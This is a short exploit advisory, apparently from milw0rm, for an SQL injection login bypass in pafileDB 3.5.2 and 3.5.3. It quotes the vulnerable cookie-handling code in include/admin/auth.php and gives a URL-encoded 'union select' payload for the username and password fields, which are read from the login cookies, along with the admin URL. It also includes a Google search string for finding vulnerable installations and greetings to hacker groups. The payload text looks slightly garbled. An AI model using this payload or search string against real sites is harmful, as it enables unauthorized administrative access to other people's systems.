# PafileDB Login SQL injection =) # author : koray & manyak@mypower.org # Risk : High # Class : Remote # Vulnerable Script : pafileDB # Version : 3.5.2 / 3.5.3 # google : powered by pafiledb 3.5.3/2 # greetz : www.cigicigi.net & redhackers Vulnerable; include/admin/auth.php c0de ; if (isset($_COOKIE['pafiledb_user']) && isset($_COOKIE['pafiledb_pass'])) { //If the cookie exists, do all this: $admininfo = array(); if (checkpass($_COOKIE['pafiledb_user'], $_COOKIE['pafiledb_pass'], $admininfo)) { //checkpass() returned true, so the user exists //$adminloggedin is a var used throughout the script to see if someone's logged in. $adminloggedin = true; $smarty->assign('admininfo', $admininfo[0]); } else { //The cookie exists, but the user/pass don't match ... username : 1%20union%20select%%20201,2,3,4/* password : 1%20union%20select%%20201,2,3,4/* / pafile/pafiledb.php?action=admin logged... # milw0rm.com [2006-12-08]